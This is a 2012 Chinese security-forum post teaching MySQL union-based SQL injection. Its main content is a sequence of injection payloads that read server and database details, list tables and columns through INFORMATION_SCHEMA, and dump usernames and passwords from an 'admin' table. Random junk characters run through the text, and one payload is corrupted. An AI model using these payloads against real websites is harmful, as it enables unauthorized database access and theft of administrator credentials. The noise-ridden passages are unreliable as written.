找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1967|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法
" ~  |8 n% Z8 C4 o; u% A. G) B9 j, v) j" \
学习盲注前先了解下 IFORMATION_SCHEMA 库) P: q& }! S5 f+ a$ D; T

! g; V2 k9 }! v5 ?. u8 hMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有7 @- e- {0 K. H% K& _% f
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
+ T2 x6 e# ~8 [) z! U4 Q1.得到所有数据库名:0 u; B8 I% N4 b# E
|SCHEMATA ->存储数据库名的表+ p) g( a; v2 M# Y7 c
|---字段:SCHEMA_NAME ->数据库名称
5 E- x/ q6 [. j# ?! n2 ]
* w: q: X& R: q5 \( Y% {* L6 G0 ~|TABLES ->存储表名
1 q; O4 ], L- ~0 N: E1 C|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名% z% v5 ~( f, e4 k' d
|---字段:TABLE_NAME ->存储表的表名
* i+ S- h( @# i5 `# u( V6 S$ V2 p6 ^1 m* Y
|COLUMNS ->存储的字段名表
$ T7 i+ [$ B0 x# V& C; m% S|---字段:TABLE_SCHEMA ->该字段所属数据库名4 V) j% p  f0 E
|---字段:TABLE_NAME ->存储所属表的名称
' \9 i* m% b- g
, C$ c9 A7 I! L5 y|---字段:COLUMN_NAME ->该字段的名称
% Q( n5 r! M1 G9 t$ K8 Z
3 i0 u+ [9 ]( \7 L3 P* }" u ! Q  u  Y+ H+ B+ Y4 N% J3 P6 k
2 e* f) U, p. x8 |+ |0 D! h
###########################################################################% ?3 s; ?& {) ~3 ]7 v: _
: I$ g* p2 f; P. C$ _( T5 _: e" |
0x001 获取系统信息:
) N6 g: C8 R6 {9 a# W: X, @" A, D( q0 T- D
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
9 b. E: ?9 N+ z7 q; F  E3 b/ e
5 X$ d- v( Y9 i! a/*& _0 X/ f# \' e8 ^3 G# ]2 j

& Q  J% z1 S  H5 J% ?4 i@@global.version_compile_os 获取系统版本
% B5 _( p1 I, D4 u5 \8 ^
) E, o- d, r- P@@datadir 数据库路径
( ?5 e( n; R7 cdatabase() 当前数据库名称
  e2 {- X" H0 E0x3c62723e 换行HEX值$ o4 U- ~$ z* m5 B5 @

2 K* T; d  }9 }1 @*/( V5 n% ^, L4 w  @$ S0 }+ I' M" i

8 ^3 o' S2 y5 v
* F8 Y, u4 |4 _  E: ^/ i# h5 q5 S
3 P' ?$ E4 v- Q3 L% @######################################################################; C' A! S/ _5 J3 `  t. _

1 R4 k! {' b5 i/ ~0x002 获取表名0 }$ `& t- B5 M5 ~# k
$ Q! @: C! q: h: l* d- e
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*6 l; z, y% C( S# X3 E. m
! c3 w5 C8 X0 ~9 g) S# w# |* C
3 F+ l8 s" S( \$ W4 w
/ q- Z: y" {* u5 w
/*9 h  a  s! f! |7 y4 ]7 s. S

0 a! y! p: E4 W( y0x67617264656e 为当前数据库名. P$ I1 M8 j3 \- P) ]5 ^5 ]

1 u# f- d; c0 `7 Pgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
/ R+ V/ r# n( [* i! ]: m, L
1 T; {7 o# _; |*/' Y7 T  f, F7 t

% f2 v5 L4 Y% b4 q& j######################################################################2 B7 X7 U1 Z6 w3 t7 y$ Y

. ~6 h: i: [& i
& F6 S' D4 ~+ ]1 J5 \/ d
$ a, x, P( c  z- x0x003 获取字段
3 U) F4 W, c; e+ ?  @: d: }( q: ?4 N5 S* Z5 R/ C& c# A/ O. A( v( e
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*& a' E6 @6 i3 g. H) ^* o
: \' t5 v+ C& x, Z) p
/*
6 F. L7 z) w$ j% {6 c) V8 b$ t8 \$ F: J* X9 x* x4 s3 [
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
! g& q3 S" g$ s7 f' z0 g! L) M
+ i, k6 W: G3 i1 M8 Q4 L0x61646d696e ->选择一个表$ ]5 X1 n" s9 A( H

, c' M5 C7 C( N6 O% {9 R" e  A3 t9 Y0x67617264656e ->数据库名
+ z9 [! M/ u9 s2 J7 V
6 a6 F; c0 x$ f  e4 @*/, f3 l/ M+ ^4 d- h" N8 q$ H
) {/ a  B4 A* j- C
#####################################################################9 L+ R3 O5 ?9 N/ I8 L  J4 {
7 Q5 o5 F6 v( b, v. N

! R$ m  Y1 @( U& D2 m7 }3 Z( J  L4 _' u) m( |  k
0x004 获取数据! U$ _6 ^$ r* d  z' E' W) I2 @7 O9 ?

6 w9 p9 r5 R% Z# t. k- k  V9 Zunion select 1,2,3
* ^  l& P& X* w* d,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin$ H; u+ ]3 d* ^7 e8 W4 z
; u& `# N! X" \( J; V, ^
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
# Q; q. I: s! _6 A- }1 b( Y+ U
* c, P3 s8 G9 M
: O. _! B0 l- C5 F- j) Z% o( E
+ x& ]2 E3 r% a- d4 |/*) z. X6 {; W2 H9 d6 O1 Z- ^
( @' S9 V" D6 E) P
0x3c62723e 换行符号HEX编码7 h+ g( O* u: |9 P1 Q

  u  [. K5 C& r2 G2 W: s0 Z: m, X& Ugroup_concat 同时获得该字段所有数据
2 \# z$ Y* v7 o6 K# _. p0 y% L) [, [) H8 F
*/) b2 w( J" B- \+ P, k( Y

; @0 U, [+ S! R: ?  _2 X8 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表